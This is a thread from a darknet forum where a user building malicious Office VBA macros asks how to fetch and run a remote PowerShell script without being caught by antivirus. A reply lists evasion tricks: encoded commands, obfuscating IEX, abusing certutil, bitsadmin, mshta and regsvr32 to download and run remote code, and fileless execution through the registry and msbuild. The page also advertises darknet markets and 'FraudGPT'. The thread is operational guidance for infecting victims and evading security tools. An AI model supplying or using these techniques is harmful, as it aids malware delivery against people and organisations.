News Feed
  • DrugHub has agreed to fully refund all users who lost money in the SuperMarket exit scam.  
  • Retro Market has gone offline. Circumstances of the closure unknown.  
  • SuperMarket has closed following an exit scam by one of the admins.  
  • The admin of Incognito Market, Pharoah, has been arrested by the FBI several months after exit scamming.  
  • Silk RoadTorhoo mini logo
  • darknet markets list
  • Popular P2P exchange LocalMonero has announced it is closing.  

VBA Macros in 2025 : hacking | Torhoo darknet markets

Hey everyone, these last couple of days I've been working on VBA macros. As you all know, they got hit hard so I'm trying to make'em work again. Recent attacks by APTs showed that they used a tool called MacroPack Pro (No way I'm buying).
You can find this information using your favourite search engine.

So far, I managed to call wscript.shell via GetObject followed by CLSID. The id is also obfuscated so we good on that part. (Tested and works with AV off).

My goal is to read and run a remote script, nothing else for now. But the problem is every time I add powershell to read and run a remote script (IEX) it gets caught by behavioural. I tried concatinating, argument obfuscation, making it unreadable yet no luck.

I would appreciate it if anyone with experience on the topic can shed some light here, feel free to DM as well.

Cheers.
/u/DarkDev77 🍼
1 points
5 days ago
Your problem with PowerShell (especially IEX) is due to the behavior analysis of AV/EDR systems. PowerShell is considered a so-called LOLBin (Living Off the Land Binary) – a legitimate tool with high potential for abuse. That's why security solutions are very sensitive to typical attack patterns.
What you can do:

🔹 Better camouflage PowerShell:
Base64-encode your command with -EncodedCommand.
Use string splitting or reversal: e.g. (“{2}{1}{0}” -f ‘X’,'E',‘I’).

🔹 Other Windows tools (LOLbins) instead of PowerShell:
These tools are often less conspicuous because they are used in everyday admin tasks:
certutil.exe: File download via -urlcache -split -f.
bitsadmin.exe: File transfer in the background.
mshta.exe: Executes .htafiles with embedded scripts.
regsvr32.exe: Loads remote scripts via scrobj.dll(/i:http://...).
wscript.exe/ cscript.exe: Executes VBS or JS, even from NTFS ADS.

🔹 File-less techniques (advanced):
Save code in the Windows registry and execute it from there.
Compile remote code via msbuild.exe or csc.exe in the RAM and start it without a file on disk.

If you need further assistance, please feel free to send me a DM. This topic is not entirely straightforward.
/u/Security101 P
1 points
4 days ago
You can send me a DM, in case you need any assistance.
/u/makeanotes
1 points
4 days ago
VBA macros are no longer a thing on updated systems in 2025. Microsoft killed macros last year? or the year before
/u/D4vyBr0nz 📢 🍼
1 points
3 days ago
I literally mentioned recent attacks, it still works.
  • Sponsors
VigorSwap Instant Crypto Exchange
FraudGPT

  • Explore Torhoo!

© Torhoo! 2025

All links are for educational and research purposes only. Torhoo! does not vouch for any site.

Advertise on Torhoo